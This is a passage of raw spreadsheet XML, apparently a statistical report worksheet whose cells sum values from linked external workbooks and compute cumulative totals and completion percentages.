      </c>
      <c r="U8" s="198">
        <f>'[10]9'!$T$108</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]9'!$U$108</f>
        <v>47.0648148148148</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]9'!$V$108</f>
        <v>27.9216472303207</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]9'!$Q$108</f>
        <v>11.17</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]9'!$R$108</f>
        <v>101.66</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]9'!$S$108</f>
        <v>2298.51</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]9'!$D$24+'[11]9'!$D$19+'[12]9'!$D$20+'[13]9'!$D$27+'[14]9'!$D$11+'[14]9'!$D$18+'[15]9'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]9'!$E$24+'[11]9'!$E$19+'[12]9'!$E$20+'[13]9'!$E$27+'[14]9'!$E$11+'[14]9'!$E$18+'[15]9'!$E$10</f>
        <v>17025</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'8'!H9</f>
        <v>142071</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4277459.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]9'!$I$24+'[11]9'!$I$19+'[12]9'!$I$20+'[13]9'!$I$27+'[14]9'!$E$26+'[14]9'!$E$33+'[15]9'!$H$10</f>
        <v>17528.033</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'8'!K9</f>
        <v>139030.849</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4236509.66</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]9'!$L$24+'[11]9'!$L$19+'[12]9'!$L$20+'[13]9'!$L$27+'[14]9'!$H$26+'[14]9'!$H$33+'[15]9'!$K$10</f>
        <v>113905.863</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]9'!$W$109</f>
        <v>0</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]9'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]9'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]9'!$T$109</f>
        <v>0</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]9'!$U$109</f>
        <v>40.8148148148148</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]9'!$V$109</f>
        <v>35.0309766763848</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]9'!$Q$109</f>
        <v>0</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]9'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]9'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]9'!$D$25+'[11]9'!$D$20+'[12]9'!$D$21+'[13]9'!$D$28+'[14]9'!$D$12+'[14]9'!$D$19+'[15]9'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]9'!$E$25+'[11]9'!$E$20+'[12]9'!$E$21+'[13]9'!$E$28+'[14]9'!$E$12+'[14]9'!$E$19+'[15]9'!$E$11</f>
        <v>0</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'8'!H10</f>
        <v>17853</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>935380.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]9'!$I$25+'[11]9'!$I$20+'[12]9'!$I$21+'[13]9'!$I$28+'[14]9'!$E$27+'[14]9'!$E$34+'[15]9'!$H$11</f>
        <v>2492.22</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'8'!K10</f>
        <v>26101.32</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>923330.04</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]9'!$L$25+'[11]9'!$L$20+'[12]9'!$L$21+'[13]9'!$L$28+'[14]9'!$H$27+'[14]9'!$H$34+'[15]9'!$K$11</f>
        <v>52958.622</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]9'!$W$110</f>
        <v>248.075201432408</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]9'!$X$110</f>
        <v>267.596153846154</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]9'!$Y$110</f>
        <v>268.827723841112</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]9'!$T$110</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]9'!$U$110</f>
        <v>24.0740740740741</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]9'!$V$110</f>
        <v>34.2086977648202</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]9'!$Q$110</f>
        <v>11.17</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]9'!$R$110</f>
        <v>52</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]9'!$S$110</f>
        <v>2816.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]9'!$D$26+'[11]9'!$D$21+'[12]9'!$D$19+'[13]9'!$D$29+'[14]9'!$D$13+'[14]9'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]9'!$E$26+'[11]9'!$E$21+'[12]9'!$E$19+'[13]9'!$E$29+'[14]9'!$E$13+'[14]9'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'8'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]9'!$I$26+'[11]9'!$I$21+'[12]9'!$I$19+'[13]9'!$I$29+'[14]9'!$E$28+'[14]9'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'8'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]9'!$L$26+'[11]9'!$L$21+'[12]9'!$L$19+'[13]9'!$L$29+'[14]9'!$H$28+'[14]9'!$H$35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12972</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'8'!H12</f>
        <v>92453.0000000002</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5034844.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>17978.343</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'8'!K12</f>
        <v>163113.881</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5192220.257</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>323747.82400005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>73.7466569476197</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]9'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]9'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]9'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]9'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]9'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]9'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]9'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]9'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]9'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'8'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'8'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>59.4032704587248</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]9'!$W$68</f>
        <v>271.625</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]9'!$X$68</f>
        <v>260.1</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]9'!$Y$68</f>
        <v>266.242948207579</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]9'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]9'!$U$68</f>
        <v>60.1851851851852</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]9'!$V$68</f>
        <v>71.2527939747327</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]9'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]9'!$R$68</f>
        <v>130.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]9'!$S$68</f>
        <v>5865.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2680</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'8'!H14</f>
        <v>20703</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>985246.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4991.293</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'8'!K14</f>
        <v>49684.095</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1842628.201</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>65896.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]9'!$W$71</f>
        <v>242.241379310345</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]9'!$X$71</f>
        <v>225.60987654321</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]9'!$Y$71</f>
        <v>213.797528920114</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]9'!$T$71</f>
        <v>58</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]9'!$U$71</f>
        <v>46.875</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]9'!$V$71</f>
        <v>50.1427356656949</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]9'!$Q$71</f>
        <v>13.92</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]9'!$R$71</f>
        <v>101.25</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]9'!$S$71</f>
        <v>4127.75</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'8'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>148.95</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'8'!K15</f>
        <v>1963.796</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>116720.296</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]9'!$W$72</f>
        <v>66.5416666666667</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]9'!$X$72</f>
        <v>64.995670995671</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]9'!$Y$72</f>
        <v>61.3867112810707</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]9'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]9'!$U$72</f>
        <v>53.4722222222222</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]9'!$V$72</f>
        <v>50.8260447035957</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]9'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]9'!$R$72</f>
        <v>115.50</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]9'!$S$72</f>
        <v>4184.00</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'8'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'8'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]9'!$W$73</f>
        <v>63.0416666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]9'!$X$73</f>
        <v>64.5367965367965</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]9'!$Y$73</f>
        <v>62.9600832150511</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]9'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]9'!$U$73</f>
        <v>53.4722222222222</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]9'!$V$73</f>
        <v>52.3775510204082</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]9'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]9'!$R$73</f>
        <v>115.50</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]9'!$S$73</f>
        <v>4311.72</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'8'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'8'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]9'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]9'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]9'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]9'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]9'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]9'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]9'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]9'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]9'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'8'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'8'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]9'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]9'!$X$74</f>
        <v>215.6</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]9'!$Y$74</f>
        <v>222.285944084066</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]9'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]9'!$U$74</f>
        <v>4.62962962962963</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]9'!$V$74</f>
        <v>6.94764334305151</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]9'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]9'!$R$74</f>
        <v>10</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]9'!$S$74</f>
        <v>571.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'8'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'8'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]9'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]9'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]9'!$Y$72</f>
        <v>9.11428571428571e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]9'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]9'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]9'!$V$72</f>
        <v>4.25170068027211e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]9'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]9'!$R$72</f>
        <v>9e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]9'!$S$72</f>
        <v>0.00035</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'8'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'8'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]9'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]9'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]9'!$Y$73</f>
        <v>239.299857697446</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]9'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]9'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]9'!$V$73</f>
        <v>70.234819606414</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]9'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]9'!$R$73</f>
        <v>9e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]9'!$S$73</f>
        <v>5781.73035</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]9'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]9'!$E$22</f>
        <v>5713</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'8'!H21</f>
        <v>63850</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2173288</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]9'!$I$22</f>
        <v>9109.58</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'8'!K21</f>
        <v>71452.98</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2137906.98</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]9'!$L$22</f>
        <v>75450.33</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>160.532617021277</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]9'!$W$81</f>
        <v>276.75</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]9'!$X$81</f>
        <v>284.230246010066</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]9'!$Y$81</f>
        <v>275.983865322295</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]9'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]9'!$U$81</f>
        <v>49.289737654321</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]9'!$V$81</f>
        <v>36.4702279721412</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]9'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]9'!$R$81</f>
        <v>106.465833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]9'!$S$81</f>
        <v>3002.22916666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]9'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]9'!$E$17</f>
        <v>6453</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'8'!H22</f>
        <v>58640</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2089621</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]9'!$I$17</f>
        <v>5796.33</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'8'!K22</f>
        <v>61027.34</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1952488.72</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]9'!$L$17</f>
        <v>187579.012</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>93.789506</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]9'!$W$79</f>
        <v>99.3452225052977</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]9'!$X$79</f>
        <v>97.8132521856254</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]9'!$Y$79</f>
        <v>102.12796604537</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]9'!$T$79</f>
        <v>48.6099537037037</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]9'!$U$79</f>
        <v>51.5579989711934</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]9'!$V$79</f>
        <v>45.5408669420149</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]9'!$Q$79</f>
        <v>11.6663888888889</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]9'!$R$79</f>
        <v>111.365277777778</v>
